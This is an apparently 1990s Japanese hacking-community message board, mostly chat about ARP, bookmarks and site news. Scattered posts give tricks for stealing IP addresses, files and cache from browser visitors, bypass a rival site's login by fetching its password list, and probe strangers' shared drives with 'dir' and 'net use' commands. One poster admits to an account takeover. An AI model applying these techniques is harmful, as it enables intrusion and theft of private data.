てみようと思いかけてみた結果数分くらいたった後１度めの結果が返ってきた
後「ＴＩＭＥ　ＯＵＴ」と返され時々返答が変えてきたのでへんに思い直接電
話をかけさせてどうゆうことなのかと確認させた結果あなたのＰＣがウイルス
に感染されてるかソフトがおかしくなってるのでμSoftへ確認してそれから再
度直らなかったら連絡してとかいわれて、でもソフトてきなことならこれでも
自信があったためそれでもくいさがってきいた結果明日担当のものから連絡さ
せるといって翌日になったらもうすでに直っている状態になっていました。
（翌日まだ使えませんか？などといって連絡してきて自分たちの責任を認めよ
うとはしない）やっぱりユーザーからの申告を利用して障害を直して何もなか
ったかのようにするようなプロバイダーというのは多いのでしょうか？よくじ
つになったら問題なくメールは使えるようにもなりすぐにかわるとゆうことも
ないとおもうのでたの「DIO？」のバックがおちてたのなら認めるのだと思うの
ですが？こうゆう返答を返したりするプロバイダーは多いんでしょうか？

  質問ばっかり担ってしまいましたが。確実につながらない理由を突き止めら
れないけっかになってしまったのでなにか小耳にはさんだことがありましたら
「DIO?」のことをしっておりましたらおしえてください。（悪いうわさなど）

入れて＜ドラッグ系

めっちゃみにくくなっちゃいあました　ほんとにすみません！！

昼の部依存していない事に気づいた。笑い

ところでドラッグ系をコンテンツに入れるのどう思います？＞見てる人
ってかもうｈｔｍｌ書いちゃったんだけどね(笑)
どう言われようが難癖つけてアップしそうだ。笑い

最近またメガデモを漁り始めたんだけど、
Windowsバージョンって意外なほど少ないんですね。

というかTBL作のやつ位しか見つからなかった（TBLは凄いです
それで気づいたんだけど、Win95でなんとか動くものはあっても
それがWin98で動くとは限らないってことですね。

さっき会社のマシンを4回もハングさせてしまった。笑い

> ども　初めまして。がん　といいます。以後よろしくお願いします。
> さすがに名高きDEF CON ZEROのサイト情報量の多さと濃さには
> ビックリしています。
> 
> ところでふとネットをうろついていて変なサイトに引っかかってしまった
> のですが、アプレットを使ってブラウザから個人情報などを抜いている
> ような表示がでるのですかこれはFAKEでしょうか？　（情報を抜いて
> いるのであればわざわざ、そのことを表示する人はいないと思うのですが・・）　
> ｊａｖａを使って匿名串からでもREALIPが抜けるようにBOOKMARKなどを
> 抜く事は可能なのでしょうか？
> 
> ここなんですが・・・
> http://www.mars.dti.ne.jp/~tsr/home/realpage.html
> 
> 

IP抜き：http://www.bekkoame.or.jp/~sanaidai/javalib/javalib.html
※上記サイとでソース買えばわかるんでは（わζぃ

Bookmarkっーかファイル抜き："file:///c:/io.sys"を別フレームに表示して
　　　　　　　　　　　　　　　Submitっーのがあったようななかったような。

キャッシュ抜き：http://www.espada.net/~welee/cgi-bin/view-cache-cow-4_06.cgi
※ただし、ねすけＯｎｌｙ．（バージョンによっては動作しないかも）
　とりあえず、ＮＮ４．０６は大丈夫な模様。

ちなみに、ＮＮ２だと楽にNetscapeMailに設定してあるメアドが抜けた。

どれも結構昔の話題だな。古の技。

参考：05月02日(日)17時29分57秒

> ども　初めまして。がん　といいます。以後よろしくお願いします。
> さすがに名高きDEF CON ZEROのサイト情報量の多さと濃さには
> ビックリしています。
> 
> ところでふとネットをうろついていて変なサイトに引っかかってしまった
> のですが、アプレットを使ってブラウザから個人情報などを抜いている
> ような表示がでるのですかこれはFAKEでしょうか？　（情報を抜いて
> いるのであればわざわざ、そのことを表示する人はいないと思うのですが・・）　
> ｊａｖａを使って匿名串からでもREALIPが抜けるようにBOOKMARKなどを
> 抜く事は可能なのでしょうか？
> 
> ここなんですが・・・
> http://www.mars.dti.ne.jp/~tsr/home/realpage.html
> 
> 

ども。
javaをＯＮにしてると、確かにGETINFO.classというのが起動するようですね。
私はjavaはわかりませんので、このファイルをダウンロードして逆コンパイルでもしてみてください。

ちなみにjavaでIPアドレスは抜けます。
ブックマークは知りません(笑)
キャッシュなら抜けるかな。

参考：05月02日(日)17時29分57秒

> いけてないなぁ
> このページも・・・

ども。
どこがいけてませんか？(笑)
詳しくおねがいします。

一辺９０ｃｍの憲法風呂敷は確かにいけてません。
萎え。

参考：05月03日(月)09時30分34秒

>いけてないなぁ
>このページも・・・
わかってないなぁ
あなたも・・

いけてないなぁ
このページも・・・

ども　初めまして。がん　といいます。以後よろしくお願いします。
さすがに名高きDEF CON ZEROのサイト情報量の多さと濃さには
ビックリしています。

ところでふとネットをうろついていて変なサイトに引っかかってしまった
のですが、アプレットを使ってブラウザから個人情報などを抜いている
ような表示がでるのですかこれはFAKEでしょうか？　（情報を抜いて
いるのであればわざわざ、そのことを表示する人はいないと思うのですが・・）　
ｊａｖａを使って匿名串からでもREALIPが抜けるようにBOOKMARKなどを
抜く事は可能なのでしょうか？

ここなんですが・・・
http://www.mars.dti.ne.jp/~tsr/home/realpage.html

> こんにちは＞☆
> 
> 
> arpをゼロにしようと言っているのではないですよ:-)
> 多数のクライアントが当然アクセスする回数が多いだろうと思われるサーバーの
> MACアドレスくらいは1分や2分しかないキャッシュではなくてスタティックに書いて
> 電源オフまで保持させる。起動時にはstartupにbatファイルなどを置いて書き込ませる
> ことでarpトラフィックが減らせるという趣旨で書きました。
> つまり毎回arpを出してる鳥頭野郎をなんとかしようと。
> 
> また、ルーターやSWにスタティックに書くのは端末が多いと大変だと読める部分が
> ありますが、私の誤読でしょうか？
> 
> ルーターやSWが端末のMACaddrを探してarpを吐くとは良くある事でしょうか？
> ルーターやSWが端末にデータを送信するのは、端末からサーバーなどに要求が出されて
> それに対する応答を中継している場合が多いと思います。すなわち直前に端末からの
> パケットを受け取っておりMACaddrはキャッシュ済だと思われます。
> 

ども＞rocketさん

そうですね。
もともとスタティックにarp情報を書き込む場合は、同一ＩＰネットワーク内の
端末の情報ですもんね。
セグメント（ルーター）を超える通信の場合は、書き込んでも意味がないですね。

IP arp 情報の保持とその時間という話として、ルーターもcacheしてるし
sw-hubもcache（SWの場合は、macだけっすね）してるという意味で書きました。
セグメント越えの通信が頻繁にある場合は、このタイマ調節なんかも
あるという意味です。
ＡＴＭのIPoAだとarpサーバーへの負荷を軽減させたり
LANエミュレーションだとBUSの負荷を軽減させる為に使ったりもします。

参考：04月30日(金)17時22分43秒

Bench Markというのを良く聞いていると思います。今更、説明する必要はないですね。
ネットワークの世界にもBench Markが存在します。
ネットワークの「容量」やサーバーの「応答の限界性能」などを測定します。

Network Benchとは、
例えば10Mの帯域を持つネットワークがあっても実際にはNIC、ケーブル、HUB、スイッチ、
ルーターの状態などでロスがあり実際には8Mや7Mだったりする訳ですが、
その7M、8Mを計測するために使います。土石流のごとくパケットを発生させ帯域を埋め尽く
します。これを使うとネットワーク内の全てのマシン間で通信不能になります。

Server Benchとは、
接続できるクライアントの最大数や応答時間などサーバーマシンの性能によって大きく
変わる事は誰でも分かると思いますが、Server Benchという方法でそれを知る事ができます。
非常に大きな負荷が予想される場合、どの程度のマシンパワーが必要かを知る目安にもなります。
テストするクライアントマシンにもそれ相応のパワーが必要ですが(時には複数台必要)
はっきり言ってサーバーにとっては拷問を受けるようなものです。

こんにちは＞☆

> 端末のIP arp情報をスタティックで書き込んでも
> ルーターも arp のパケット吐いちまうっすね
> IP arp cache で設定されてる時間しか保持しないんですよね
> ルーターの場合､こいつをスタティックに書き込んじまうと
> ネットワーク内のブロードキャストは減るんだけど
> 端末の増移設やアドレス変更なんかがあると、そのたびに
> かきかえなきゃいけないから大変っすけどね。
> あとSW-HUBで保持するMAC情報のテーブルも関係してきますね。

arpをゼロにしようと言っているのではないですよ:-)
多数のクライアントが当然アクセスする回数が多いだろうと思われるサーバーの
MACアドレスくらいは1分や2分しかないキャッシュではなくてスタティックに書いて
電源オフまで保持させる。起動時にはstartupにbatファイルなどを置いて書き込ませる
ことでarpトラフィックが減らせるという趣旨で書きました。
つまり毎回arpを出してる鳥頭野郎をなんとかしようと。

また、ルーターやSWにスタティックに書くのは端末が多いと大変だと読める部分が
ありますが、私の誤読でしょうか？

ルーターやSWが端末のMACaddrを探してarpを吐くとは良くある事でしょうか？
ルーターやSWが端末にデータを送信するのは、端末からサーバーなどに要求が出されて
それに対する応答を中継している場合が多いと思います。すなわち直前に端末からの
パケットを受け取っておりMACaddrはキャッシュ済だと思われます。

参考：04月30日(金)14時39分59秒

> ときどき見てたんですけど書くのははじめてかな。
> 年に数回しか書かないから
> 
> 
> 
> １２桁だから６／６じゃないですかね？
> 
> 
> rarpはrarpサーバーが有ってarpテーブルを引けることが
> 前提だから、使える環境はあんまり見ないですね。
> 負荷的にもうまみがないので構築もしません。
> 
> 人間に例えるならMACaddressは「顔」、IPaddressは「名前」
> と考える。「〜さんの所へ行け」と言われても「顔」を知らない
> ので皆に尋ねる。つまりブロードキャスト(arp)を吐く。
> 
> 一度コネクションすればarpテーブルに記録されるので次回は
> arpを流さないが、Windowsはたったの２分でそれを忘れます。
> 一度会った人の顔を２分で忘れるのだから、メールBOXの自動チェック
> などを10分や15分に設定してセグメント内の皆が使っている場合
> メールサーバーを見付けるためにその都度ブロードキャストしています。
> 
> UNIX系はshutdownするまで憶えている。
> 
> arpが流れすぎるのもネットワークのトラフィックに神経質な
> 所では嫌います。これを回避するためにarpテーブルを
> スタティックに書き込むBATファイルをautoexec.batに追加する
> という方法を良く取ります。

arp -s IPaddress MAC address

って方法ですね。
ちなみに
Win95だと IP arp情報を保持してるのって １分だったような気がします。
NTとか98とか revによってちがうのかな？
あとレジストリで変更できるかもしれないっすね
うん

端末のIP arp情報をスタティックで書き込んでも
ルーターも arp のパケット吐いちまうっすね
IP arp cache で設定されてる時間しか保持しないんですよね

ルーターの場合､こいつをスタティックに書き込んじまうと
ネットワーク内のブロードキャストは減るんだけど
端末の増移設やアドレス変更なんかがあると、そのたびに
かきかえなきゃいけないから大変っすけどね。

あとSW-HUBで保持するMAC情報のテーブルも関係してきますね。

参考：04月26日(月)01時30分33秒

ども。

> おいらたちは、このハードウエアアドレスのことを
> ＭＡＣアドレスもしくは物理アドレスとよんだりしてます。

ＭＡＣアドレスが一般的なような気がします。


> これが、今ホットなのですか？

Win9x/NTに対してDOSアタックができるようです。
やっぱwinユーザー多いですからねヽ(´ー｀)ﾉ 

参考：04月24日(土)17時38分33秒

こんにちは！　xinnと言います。
ここはとってもcoolなサイトですね。
私も　Real_Networks　というサイトを最近本格的に運営始めました。
ネットワークセキュリティなど、こことも合い通じるものがるので
相互リンクしませんか！
まだアングラ初心者ですがお互いに情報交換とかもできればいいですね。
今は下記の３つで運営してます。
http://hiro567.virtualave.net/（メイン）
http://server12.hypermart.net/xinnsinn/（ミラー）
http://www.nettaxi.com/citizens/xinn/（ミラー）

BBSもあるのでよかったら遊びに来てくださいよ。
http://server12.hypermart.net/xinnsinn/bbs/rnbbs.cgi

でわよろしく！

http://hiro567.virtualave.net/

ときどき見てたんですけど書くのははじめてかな。
年に数回しか書かないから


>上位３バイトが製造メーカーをあらわすもので
>下位３バイトが製品固有のものっすね

１２桁だから６／６じゃないですかね？


rarpはrarpサーバーが有ってarpテーブルを引けることが
前提だから、使える環境はあんまり見ないですね。
負荷的にもうまみがないので構築もしません。

人間に例えるならMACaddressは「顔」、IPaddressは「名前」
と考える。「〜さんの所へ行け」と言われても「顔」を知らない
ので皆に尋ねる。つまりブロードキャスト(arp)を吐く。

一度コネクションすればarpテーブルに記録されるので次回は
arpを流さないが、Windowsはたったの２分でそれを忘れます。
一度会った人の顔を２分で忘れるのだから、メールBOXの自動チェック
などを10分や15分に設定してセグメント内の皆が使っている場合
メールサーバーを見付けるためにその都度ブロードキャストしています。

UNIX系はshutdownするまで憶えている。

arpが流れすぎるのもネットワークのトラフィックに神経質な
所では嫌います。これを回避するためにarpテーブルを
スタティックに書き込むBATファイルをautoexec.batに追加する
という方法を良く取ります。

Weleeさん、遅まきながらＲＥＳ有り難うっす。
それから、マルコさん、ここでは初めてですね。

まきはbookmarkはほとんど使用せず、shortcutをフォルダーで整理して
使ってます。
それから、話題が少しずれますが、ＮＮでの履歴は色々な面で便利です。
特に、bookmarkするの忘れた時。いつ訪問したかとか訪問回数とかも、
trl+H一発で見れます。
ついでに、カキコしますが、下記はネスケの色々な隠しコマンドのことが
記載されています。最近見つけましたが、以前のとこより詳しいです。

http://www.imasy.or.jp/%7Eyotti/mozilla.html

＞RZさん、bookmarkツールなら、下記に色々有りますので行かれてみては。

ftp://ftp.vector.co.jp/pack/win95/net/www/bookmark/00_index.txt

> 
> そうですね。
> アドレス解決プロトコルのことです。
> ARP/RARPのARPです。
> 
> ＩＰアドレスをハードウェアアドレスに変換する際に使用されます。
> 

おいらたちは、このハードウエアアドレスのことを
ＭＡＣアドレスもしくは物理アドレスとよんだりしてます。
（アップルのマックのことじゃないですが）
上位３バイトが製造メーカーをあらわすもので
下位３バイトが製品固有のものっすね

ネットワークからみだと、ＮＩＣ（ネットワークインターフェースカード）
のアドレスを表すものだと思いますが

ＴＣＰ／ＩＰのような第三層の通信でも結局、第二層レベルでの
接続が前提なので、かならず関係してくるところっすね

IP arp 情報とか ・・・・・・・・

これが、今ホットなのですか？

参考：04月24日(土)07時40分33秒

> 
> ARPって Address Resolution Protocol の ARPですか？

そうですね。
アドレス解決プロトコルのことです。
ARP/RARPのARPです。

ＩＰアドレスをハードウェアアドレスに変換する際に使用されます。

参考：04月24日(土)06時12分36秒

> 最近話題になってきたARPですが、
> 実は昔っからある方法だったのですね。
> ethまでさかのぼっていろいろやるのはまだ殆どやってないのですけど。
> 
> しかし、ウィンドウが開くからDOSになるってのは面白い。
> あと同期とる必要も、ポート調べる必要もないというのもまたヨシ。
> 
> 

ARPって Address Resolution Protocol の ARPですか？

参考：04月23日(金)18時52分29秒

最近話題になってきたARPですが、
実は昔っからある方法だったのですね。
ethまでさかのぼっていろいろやるのはまだ殆どやってないのですけど。

しかし、ウィンドウが開くからDOSになるってのは面白い。
あと同期とる必要も、ポート調べる必要もないというのもまたヨシ。

> 初めて書き込みます。D00dleって言います。以後お見知りおきを。
> RZさんの足跡は、色々な鯖で見かけます :)

そうですか(笑)
ちょっと前に整理した時に殆ど消したのですけどね。
って掲示板の事かな？


 
> WinGateはデフォルトでログを取らない、っていうことで結構気軽に利用してたんですが、最近気になって調べてみたら、なんと、標準でログをとるようになってるんじゃありませんか。
> 日本バージョンの2.0eはデフォルトでTelnet Proxyがインストールされるのは普通なんですが、ログはしっかり取られてました。
> WinGateはSecureなんて信じるのがおかしいかもしれませんが、ちょっと今びびってます(笑)。
> WinGate 1.xならログは取られないんだろうけど、2.x以降は駄目なんですね。どうやってバージョンチェックすればいいのかな。いいアイデアありませんか？

ええと、そうですね、評判になってからバージョンアップされた2.xの方はばっちり取られます。
しかしですね、ログを取られる取られないに関わらず、他人のマシン経由というのは非常に危ないものです。
なんせパケットが中継されるわけですから、そのマシンでパケットモニタされると
通信内容が全部筒抜けになるわけです。
気をつけましょう。

で、アイデアってほどでもないですが、たまに8010ポートでＣドライブを共有している
場合があるので、そこでインストールされているWinGateのバージョンを調べるというのはいかがでしょうか？

では。

参考：04月23日(金)17時25分22秒

初めて書き込みます。D00dleって言います。以後お見知りおきを。
RZさんの足跡は、色々な鯖で見かけます :)
それはさて置き。

WinGateはデフォルトでログを取らない、っていうことで結構気軽に利用してたんですが、最近気になって調べてみたら、なんと、標準でログをとるようになってるんじゃありませんか。

日本バージョンの2.0eはデフォルトでTelnet Proxyがインストールされるのは普通なんですが、ログはしっかり取られてました。

WinGateはSecureなんて信じるのがおかしいかもしれませんが、ちょっと今びびってます(笑)。

WinGate 1.xならログは取られないんだろうけど、2.x以降は駄目なんですね。どうやってバージョンチェックすればいいのかな。いいアイデアありませんか？

> ブラウザってブックマークの登録は簡単だけど、削除がめんどい
> ですね。
> 見ているページを即「ブックマークから削除」できると便利なのに。
> 
> しょうもない話題ですみません。
> ふと、思ったもので。

おはようございますマルコさん。
てゆーかおひさですねー。

で、ブックマークですが、
たしかにそうですね。
それよりブックマークの整理が非常にウザいです(笑)
なんとかしてほしい・・・・
っていうかブックマークを簡単に整理出来るツールがあれば教えてください＞どなたか

関係ないですけど
後程いろいろな戯れ言でもアップしようかと思ってます。
でわ。

参考：04月22日(木)01時49分20秒

ブラウザってブックマークの登録は簡単だけど、削除がめんどい
ですね。
見ているページを即「ブックマークから削除」できると便利なのに。

しょうもない話題ですみません。
ふと、思ったもので。

作成途中のホームページをZipでしめて配布する人はいませんね(^^;

＞Nyahoooさん
最近のブラウザは、指定したページをリンクも含めて保存できる機能も
ついてたりするから、そういうのを使ってみたら？
IEとか、更新に合わせてファイルの同期を取ってくれるし。

> で、RZさんが言ってる
> って意味わかってる？
> 
> ロ−カルで見れない波乗りがあったら教えてくれ（笑）
> っていうか、UGTOPクラスのFAQ見る前に人並みの修行積んで来るがええ☆

まぁまぁ(笑)

というかＦＡＱは相対パスで作成していますので
ダウンロードしたファイルをそのままローカルに保存すれば見ることが出来ると思います。
また、zipなどの形式で配布するまでＦＡＱが出来ていないので、
やるつもりはありません。
完全に書き終えたら考えます。
それでは。

参考：04月21日(水)00時11分56秒

で、RZさんが言ってる
>波乗りかなんかでダウンロードすればいいじゃないですか勝手に。
って意味わかってる？

>（Htmlファイルがローカルパスでみられる？というもの・保存版）
ロ−カルで見れない波乗りがあったら教えてくれ（笑）
っていうか、UGTOPクラスのFAQ見る前に人並みの修行積んで来るがええ☆

お返事ありがとうございます。Nyahooです。
RZさん>わかりにくい
ダイアルアップユーザなので、
ZIPでFAQが固めてあったりしたらいいなと思ったんです。
時々ところどころのサイトでそーいうの見かけたので...
（Htmlファイルがローカルパスでみられる？というもの・保存版）
いずれにせよソフトとか探せばいいみたいですね。勉強して出なおします。。

> お願いというのは、FAQをまとめてDLさせてほしい！というものです。
>･･でも今見たのですが、絶対パス（とかいうもの）ですのね、リンクは。手間ですね･･

適当に改行してください、見にくいです。
で、ＦＡＱをコピーとのことですが、
波乗りかなんかでダウンロードすればいいじゃないですか勝手に。
それともミラーサイトでも作るのですか？
意味がわかりません。
でわ。

参考：04月18日(日)02時55分08秒

> はじめまして
> 今更ですがリニューアルおめでとうございます。
> 例のMadAngelくんの噂を聞いて急いできたんですが
> もうとっく遅かったですね（笑）

ですね。
現在はインデックスを0秒リフレッシュするようになってます。
今後に期待していたのに残念です(笑)

参考：04月18日(日)02時16分03秒

> 
> 朝にはいきなり失礼な真似をして申し訳ありません。
> 昨日夜の部が潰れるという話が出た時、「こちらに移動」という書き込みが
> あって、ああそうなのかとノコノコやってきた次第です。
> 結局夜の部は潰れていないようですが...
> 
> でも、もし宜しければこれからも覗きに来させていただければ幸いです。
> 
それって俺の書き込みじゃないか（わらぃ
「行くところがなくなるから俺はここに行く」って意味で
書いただけで移転とは言ってないっす。紛らわしくてごめんね。

参考：04月14日(水)05時36分15秒

madangelのページすべて落としておきました。
消されるぎりぎりで間に合ってよかった。(笑)
(もちろんパスワードとかも一緒に)
それとredappleさんの情報を入手(ICQにあったものだけど・・・
いまはなもうない)して、それを利用して、鳥さんの垢とってしま
しました。

う〜〜ん、悪い事をしてしまったのかなぁ。

テイストレスな人たち、のコンテンツ無くなっちゃったんですね。
個人的にお気に入りだったのでちょっと残念。
波乗り野郎で一括ダウンロードしておけばよかった。

でも、新しいDefConZeroも期待しています。
ではでは。

はじめまして。遅くなりましたが、リニューアルおめでとうございます。新ページも超！クール！！death.
実はあつかましいお願いの儀がございましてまかりこしました。
僕はものすごいNewbie（とかいうもの）で、だからUndergroundF.A.Q.はいつも拝用重用させていただいてたんですが、
こないだ、だから心臓が止まりました。こちらに行けなくて。
お願いというのは、FAQをまとめてDLさせてほしい！というものです。･･でも今見たのですが、絶対パス（とかいうもの）ですのね、リンクは。手間ですね･･（あれ、痴漢すればいいのかな？Softlyに）

黙殺承知のお願いです。もちろん自力で保存させていただきましたが、海賊版と正規版の安心感は格段違いますし･･て書いててホント厚かましいなと思えてきました、が。
多分需要はものすごいものがあると思います。ご検討下さい。
それからすでに存在し僕の探し様が足りなかった場合は失礼をいたしました。（危険な遠くまで探検に行けないのです、まだ）長文、失礼いたしました。

はじめまして
今更ですがリニューアルおめでとうございます。
例のMadAngelくんの噂を聞いて急いできたんですが
もうとっく遅かったですね（笑）

どうも、おひさです。
リニューアルおめでとうございます。
左目がとってもキュートですね（笑い）
ところで、madengelくんのところ、
つぶれてるやん。
あれ、絶対ネタだって。うん、ネタ。

> 
> 私の知る限りでは、ｂｏｄｙタグ出現ランキング２位に入ります。
> ちょっと極悪はいったページですよね。
> きっと、狙ってるんでしょう。
> 

すいません。私、最近ちょっと調査に手を抜いてました。反省します。

□新発見！　Ｂｏｄｙタグの正しい使い方
<Body 引数>の指定の内、引数は必ず１つでなければならない！！！
ケッして、<body Text="red" BGColor="blue">などと複数にまたがるのは
ダウソである。

□その他〜作者のこだわり〜
　タグの開け閉めは、マイルドに。たとえば、<body>複数に対し</body>は１つ。
また、インデックスページフレーム冗談では、<form>がなく、残された</form>
がいい雰囲気をかもし出しています。
また、<marquee>などのブラウザ依存の強いタグを使うところもポイント高いです。

Ｐ．Ｓ．ＲＺ殿
　彼の発言消すときに、一緒に自分のも消してくらさい。
なんか・・・・・・かなιぃから。

参考：04月17日(土)00時35分52秒

> なんでいきなりBODYタグが６つもでてくんの？(笑)
> 面白いね。

私の知る限りでは、ｂｏｄｙタグ出現ランキング２位に入ります。
ちょっと極悪はいったページですよね。
きっと、狙ってるんでしょう。


以下天才。

池添かまぼこのホームページ  
かまぼこ屋さんの通信販売ページ。
テクニック的にはそれほど凄いものはないのだが、<BODY>がなんと５つも存在する！これは現時点での当研究所公認世界記録である。かまぼこは結構ウマそう→サイバーかまぼこ
ちなみに最後の</HTML>の">"が無いので</htmlという文字列が文書の最後に寂しくセンタリングされている。(ということは<CENTER>も閉じていないということか!?)
上のマンダラネットの中のWebPageである。このプロバイダにしてこの会員あり、というところか。 
 96/12/09 なんと</HTML>タグがちゃんと閉じてます。しかし５つの<BODY>タグはそのまま。
狙ってんでしょうか？


http://www.mandala.co.jp/ikezoe/ 


富井君チへようこそ！ 
まずは何もいわずに"View source"しましょう。……いくつありました？<BODY>タグ。
なんと13個!!
池添かまぼこ店の記録を大幅に更新して、極悪HTML研究所公認「<BODY>タグ数部門」世界記録保持者は、この富井君となりました。
もちろん見所はそれだけではありません。<I><H2><BLINK><MARQUEE>と、「使える物は全て使って修飾する」。この姿勢が正しい極悪HTMLを生み出すのです。
<META NAME="keywords">などの極悪じゃないタグを使っているわりに<HEAD>...</HEAD>が無いなど、細部に関しても作者のこだわりが感じられます。
文句なしに97年度上半期最初にして最大の収穫といえるでしょう。 
http://www.spnet.or.jp/~justomdf/index.html 

http://www.geocities.co.jp/HeartLand-Namiki/6549/gokulink.html

> Weleeさん、お久しぶりです、お元気ですか。
> たまには、あちらにも顔を見せて下さいよお。
> 

了解しました。

> ところで、Ｗｉｎ９５でも出来ましたけど。
> ただ、dir \\MachinName\共有名だけでも良いようなぁ．．．

それだと、サブディレクトリ配下までみつけてくれないのです。

> dir /B /S /A:-D \\MachineName\共有名だと、カレントディレクトリまでずらずらと現れました。
> ちなみに-Dの-を取るとサブディレクトリだけで、ファイル名は出て来ません。

/Sオプションが曲者でこいつをつけると、Win95非対応になりんす。

> 
> それから、パスが掛かっていると、パスワードが違いますと表示されるけど、
> ＤＯＳでパスワードを入れる方法が解りません。 (^^;)
> Net USE u: \\machine\共有名はマイコンピュ−タ−フォルダーに見事に、アイコンが出来ていました。

ヘルプは、net help useでみれます。
パスは、net use u: \\machine\共有名 Passwordです。

参考：04月13日(火)22時40分04秒

Info@YFT、リニュ−アルしたようなので、
下記パッケ−ジはすでに消されてました(^^;

RedAppleんとこのウイルスのパッケ−ジ、どっかで見たことあんだよなぁ
特に「発見不可能」ってやつ（Info@YFTあたりに置いてなかったっけ？）

それにしても、今更、ウイルスバスタ−９５でチェックして
発見不可能はないだろ（笑）

そういやぁ、Info@YFTにも、
Nortonとバスタ−９５とMcAFEEでチェックとか書いてあったな
う〜ん・・・謎だ（笑）

こんにちわ。おはつです。
あやしげなところからおとしたBOのくらいあんとをじっこうしたら、じつはさーばーのほうでした。
だまされました。ぼくはみじゅくものです。でわ。

＞「８、　会員人数が異常に多すぎる場合は、抽選になります。」

無料でもたったの１７人しか集まらないのにそんな事まで心配するのか？(笑)

> どうも!!!!
> HPありますので、是非見に来て下さい。(会員制もあり)

あ、そうそう忘れてたけど、
あんなヘボい認証なんて簡単に突破されちゃいますよ。

やり方：
ソースを見ると、members.javaってのがあるので、それをダウンロードする(笑)
で、テキストエディタで中の文字列を追って行くと、何故かgifファイルの指定がある。
で、今度はそのgifをダウンロードする。
で、これがＩＤとパスの羅列なのね。

ちなみに直にＵＲＬ指定しても行ける。
つまり、会員ページからリンクが張ってあるので、
リンク先のユーザーがrefererを取っていたら会員ページのＵＲＬはまるわかり。

もっとアタマ使ったほうがイイよ(笑)＞radapple
つーか、ソースみて思ったんだけどさ
なんでいきなりBODYタグが６つもでてくんの？(笑)
面白いね。

参考：04月14日(水)22時18分15秒

> 裏みっひー帝国のLong Walkのところのコメントに「そういえばぁスケの人どうしてんだろ。」と
> ありますが今でも活動してますよ。ログ読みはやってませんが。
> 
> しぱまにあ：http://www.geocities.com/Paris/Cafe/7893/に入り口があります。

情報ありがとうございます。
近いうちにリンク集を変更します。
最近ぁゃιぃがいろいろ変わってて面白い。

参考：04月15日(木)03時47分46秒

> どうも!!!!
> HPありますので、是非見に来て下さい。(会員制もあり)
> http://www.madang3ls.8m.com/
> 相互リンク募集中です。
> これからもよろしくお願いします。
> 

ども。
貴方のサイトを拝見しましたが、典型的厨房サイトですね(笑)
貴方のところにあるリンク集はカルトブックマークのコピーだし
携帯の話は掃除人さんのテキストですね。
で、あなたが書いたというフリーキングのテキストも間違いだらけです。
無課税の形態ってなんですか(笑)

でさ、
アンタこれ全部理解して載せてんの？
例え理解して噛み砕いて掲載しなおすならともかく
コピーライトまで削って載せるってのはどういうことなのよ。
転載許可とってんの？

上のフレームもわけわかんねーしさ
アンタ出直して来いよ(笑)

＃ちゅーわけでMad某くんの投稿内容はもうすぐ消します(笑)

参考：04月14日(水)22時18分15秒

裏みっひー帝国のLong Walkのところのコメントに「そういえばぁスケの人どうしてんだろ。」と
ありますが今でも活動してますよ。ログ読みはやってませんが。

しぱまにあ：http://www.geocities.com/Paris/Cafe/7893/に入り口があります。

http://shipa2.hypermart.net/cgi-bin/

RZさん、ホームページのリニューアル、おめでとうございます。
これからもちょくちょく拝見しにまいりますので、よろしくお願いいたします。

ところでもう一個の掲示板が、とっても気になるのですが・・・
解読するのに時間かかりますかね(^^;
ってこの話は、ここでしちゃダメ？

どうも!!!!
HPありますので、是非見に来て下さい。(会員制もあり)
http://www.madang3ls.8m.com/
相互リンク募集中です。
これからもよろしくお願いします。

http://www.madang3ls.8m.com/

SigmaLoopと申します。
遅い発言ですが、リニューアルおめでとうございます。
これからも拝見させて頂きます。それでは。

> 昨日夜の部が潰れるという話が出た時、「こちらに移動」という書き込みが
> あって、ああそうなのかとノコノコやってきた次第です。

うはは、なるほど(笑)
ふつうドメイン名でわかりそうなものですけどね。うはは

そういえば夜の部閉鎖はガセで、
ログ飛び問題も解決したようですね。
ちなみに悪さをしてたのはコントロールコードだったようです。
(おそらく0x019〜0x1a)
ちなみにWinでコードを出すにはALT+数字で、たとえば0xffを出したい場合は
ALT,2,5,5とうてばＯＫ。ALTキーを離すとコードがでます。


> でも、もし宜しければこれからも覗きに来させていただければ幸いです。

どうぞどうぞ。
まだたいしたものないですけど。
 

参考：04月14日(水)05時36分15秒

> 
> 移転先とはなんでしょう？
> 

朝にはいきなり失礼な真似をして申し訳ありません。
昨日夜の部が潰れるという話が出た時、「こちらに移動」という書き込みが
あって、ああそうなのかとノコノコやってきた次第です。
結局夜の部は潰れていないようですが...

でも、もし宜しければこれからも覗きに来させていただければ幸いです。

参考：04月13日(火)14時17分08秒

みなさん、どうもありがとう御座います。
なんつーか、マキシマムセキュリティとかシャドウペンギンとかで
すごい内容みてしまうとどうもしょぼくなったもんで(笑)
サイトデザインとかどうしようか考えちゅぅです。

ま、１から出直しってことで、よろしくお願いします。

Weleeさん、お久しぶりです、お元気ですか。
たまには、あちらにも顔を見せて下さいよお。

ところで、Ｗｉｎ９５でも出来ましたけど。
ただ、dir \\MachinName\共有名だけでも良いようなぁ．．．
dir /B /S /A:-D \\MachineName\共有名だと、カレントディレクトリまでずらずらと現れました。
ちなみに-Dの-を取るとサブディレクトリだけで、ファイル名は出て来ません。

それから、パスが掛かっていると、パスワードが違いますと表示されるけど、
ＤＯＳでパスワードを入れる方法が解りません。 (^^;)
Net USE u: \\machine\共有名はマイコンピュ−タ−フォルダーに見事に、アイコンが出来ていました。

あ、遅れましたけど、ＲＺさん、新装開店おめでとう御座います。
いやぁ、イメージと違っていました。もっと恐いってゆうか、鋭い眼をしたお方を想像していました。

以前は、違うＨＮでカキコした事も有りますが、スキルの無い野郎なので、
これからは、ＲＯＭさせていただいます。

はじめまして、J.J.です

時々訪問させて頂いておりました
リニューアルされたんですね、おめでとうございます
一時期、閉鎖になってしまわれたのかと心配していました

> こちらが移転先ですか？
> とにかく宜しく。

移転先とはなんでしょう？

参考：04月13日(火)08時27分43秒

ていうかDef Con ZeroさんのHPでしたか
おじゃまします

こちらが移転先ですか？
とにかく宜しく。

閉鎖と知らずにとんでもないラス発言してしまった

リニューアルしたんですね。おめでとうございます。
ちょっとあ**いっぽいところがいけてますね(笑)。

おいしいソース有り難うございました。　研究材料としては最高です。
これからも頑張ってください。
妹がZEROさんの目の写真、気に入ってしまい、壁紙にならべてる・・
こわいな・・・

リニューアルして、なんかオトナの雰囲気が出てますね(謎)
これからもナイスなハック、期待してますよ〜
あ、あとウチにリンクしてくれたんですね... ありがとうございます。
しかも、あんなコメントまで... うぅ、こりゃがんばらんと...

はじめまして 、復活したんですね。
今までちょくちょく見に来てました。
